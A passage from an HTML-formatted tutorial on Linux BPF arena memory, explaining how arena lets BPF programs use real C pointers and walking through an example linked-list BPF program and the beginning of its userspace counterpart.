&lt;span class="c1"&gt;// Traverse requires repeated map lookups&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;head_idx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;nodes_map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;next_idx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// No pointer following!&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every node access requires a map lookup. You can't just follow pointers like normal C code. The verifier won't let you use pointers across different map entries. This makes implementing trees, graphs, or any pointer-based structure incredibly awkward and slow.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Sparse Shared Memory with Real Pointers
&lt;/h3&gt;

&lt;p&gt;In 2024, Alexei Starovoitov from the Linux kernel team introduced BPF arena to solve these limitations. Arena provides a &lt;strong&gt;sparse shared memory region&lt;/strong&gt; between BPF programs and userspace, supporting up to 4GB of address space. Memory pages are allocated on-demand as you use them, so you don't waste space. Both kernel BPF code and userspace programs can map the same arena and access it directly.&lt;/p&gt;

&lt;p&gt;The game-changer: you can use &lt;strong&gt;real C pointers&lt;/strong&gt; in BPF programs targeting arena memory. The &lt;code&gt;__arena&lt;/code&gt; annotation tells the verifier that these pointers reference arena space, and special address space casts (&lt;code&gt;cast_kern()&lt;/code&gt;, &lt;code&gt;cast_user()&lt;/code&gt;) let you safely convert between kernel and userspace views of the same memory. Userspace gets zero-copy access through &lt;code&gt;mmap()&lt;/code&gt;: once the region is mapped, reading or writing arena data needs no further syscalls.&lt;/p&gt;

&lt;p&gt;Here's what the same linked list looks like with arena:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Real pointer!&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Traverse with normal pointer following&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Just follow the pointer!&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Clean, simple, exactly how you'd write it in normal C. The verifier understands arena pointers and lets you dereference them safely.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why This Matters
&lt;/h3&gt;

&lt;p&gt;Arena was inspired by research showing the potential for complex data structures in BPF. Before arena, developers were building hash tables, queues, and trees using giant BPF array maps with integer indices instead of pointers. It worked, but the code was ugly and slow. Arena unlocks several powerful use cases.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In-kernel data structures&lt;/strong&gt; become practical. You can implement custom hash tables with collision chaining, AVL or red-black trees for sorted data, graphs for network topology mapping, all using normal pointer operations. &lt;strong&gt;Key-value store accelerators&lt;/strong&gt; can run in the kernel for maximum performance, with userspace getting direct access to the data structure without syscall overhead. &lt;strong&gt;Bidirectional communication&lt;/strong&gt; works naturally - both kernel and userspace can modify shared data structures using lock-free algorithms. &lt;strong&gt;Large data aggregation&lt;/strong&gt; scales up to 4GB instead of being limited by typical map size constraints.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Building a Linked List in Arena Memory
&lt;/h2&gt;

&lt;p&gt;Let's build a complete example that demonstrates arena's power. We'll create a linked list where BPF programs add and delete elements using real pointers, while userspace directly accesses the list to compute sums without any syscalls.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: arena_list.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */&lt;/span&gt;
&lt;span class="cp"&gt;#define BPF_NO_KFUNC_PROTOTYPES
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_experimental.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARENA&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_flags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_F_MMAPABLE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* number of pages */&lt;/span&gt;
&lt;span class="cp"&gt;#ifdef __TARGET_ARCH_arm64
&lt;/span&gt;    &lt;span class="n"&gt;__ulong&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_extra&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x1ull&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* start of mmap() region */&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;    &lt;span class="n"&gt;__ulong&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_extra&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x1ull&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;44&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* start of mmap() region */&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;arena&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_arena_alloc.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_arena_list.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_node&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_head&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;skip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cp"&gt;#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
&lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="n"&gt;arena_sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="n"&gt;test_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_head&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="n"&gt;global_head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".addr_space.1"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;test_val&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".addr_space.1"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"syscall"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;arena_list_add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="cp"&gt;#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
&lt;/span&gt;    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;list_head&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;global_head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;can_loop&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_alloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="n"&gt;test_val&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;list_add_head&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;    &lt;span class="n"&gt;skip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"syscall"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;arena_list_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="cp"&gt;#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
&lt;/span&gt;    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;list_for_each_entry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;list_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;list_sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;    &lt;span class="n"&gt;skip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program starts by defining the arena map itself. &lt;code&gt;BPF_MAP_TYPE_ARENA&lt;/code&gt; tells the kernel this is arena memory, and &lt;code&gt;BPF_F_MMAPABLE&lt;/code&gt; makes it accessible via &lt;code&gt;mmap()&lt;/code&gt; from userspace. The &lt;code&gt;max_entries&lt;/code&gt; field specifies how many pages (typically 4KB each) the arena can hold - here we allow up to 100 pages, or about 400KB. The &lt;code&gt;map_extra&lt;/code&gt; field sets where in the virtual address space the arena gets mapped, using different addresses for ARM64 vs x86-64 to avoid conflicts with existing mappings.&lt;/p&gt;

&lt;p&gt;After defining the map, we include arena helpers. The &lt;code&gt;bpf_arena_alloc.h&lt;/code&gt; file provides &lt;code&gt;bpf_alloc()&lt;/code&gt; and &lt;code&gt;bpf_free()&lt;/code&gt; functions - a simple memory allocator that works with arena pages, similar to &lt;code&gt;malloc()&lt;/code&gt; and &lt;code&gt;free()&lt;/code&gt; but specifically for arena memory. The &lt;code&gt;bpf_arena_list.h&lt;/code&gt; file implements doubly-linked list operations using arena pointers, including &lt;code&gt;list_add_head()&lt;/code&gt; to prepend nodes and &lt;code&gt;list_for_each_entry()&lt;/code&gt; to iterate safely.&lt;/p&gt;

&lt;p&gt;Our &lt;code&gt;elem&lt;/code&gt; structure contains the actual data. The &lt;code&gt;arena_list_node&lt;/code&gt; member provides the &lt;code&gt;next&lt;/code&gt; and &lt;code&gt;pprev&lt;/code&gt; pointers for linking nodes together - these are arena pointers marked with &lt;code&gt;__arena&lt;/code&gt;. The &lt;code&gt;value&lt;/code&gt; field holds our payload data. Notice the &lt;code&gt;__arena&lt;/code&gt; annotation on &lt;code&gt;list_head&lt;/code&gt; - this tells the verifier this pointer references arena memory, not normal kernel memory.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;arena_list_add()&lt;/code&gt; function creates list elements. It's marked &lt;code&gt;SEC("syscall")&lt;/code&gt; because userspace will trigger it using &lt;code&gt;bpf_prog_test_run_opts()&lt;/code&gt;. The loop allocates new elements using &lt;code&gt;bpf_alloc(sizeof(*n))&lt;/code&gt;, which returns an arena pointer. We can then dereference &lt;code&gt;n-&amp;gt;value&lt;/code&gt; directly - the verifier allows this because &lt;code&gt;n&lt;/code&gt; is an arena pointer. The &lt;code&gt;list_add_head()&lt;/code&gt; call prepends the new node to the list using normal pointer manipulation, all happening in arena memory. The &lt;code&gt;can_loop&lt;/code&gt; check satisfies the verifier's bounded loop requirement.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;arena_list_del()&lt;/code&gt; function demonstrates iteration and cleanup. The &lt;code&gt;list_for_each_entry()&lt;/code&gt; macro walks the list following arena pointers. Inside the loop, we sum values and delete nodes. The &lt;code&gt;bpf_free(n)&lt;/code&gt; call returns memory to the arena allocator, decreasing the reference count and potentially freeing pages when the count hits zero.&lt;/p&gt;

&lt;p&gt;The address space cast feature is crucial. When &lt;code&gt;__BPF_FEATURE_ADDR_SPACE_CAST&lt;/code&gt; is defined, the &lt;code&gt;__arena&lt;/code&gt; annotation works as a real compiler address space. Without this support, the globals are placed in arena memory through an explicit section annotation, &lt;code&gt;SEC(".addr_space.1")&lt;/code&gt;, and both programs set &lt;code&gt;skip = true&lt;/code&gt; instead of touching the list. Userspace checks that flag and reports a skip rather than failing at runtime.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: arena_list.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/mman.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdint.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_arena_list.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"arena_list.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_node&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;uint64_t&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

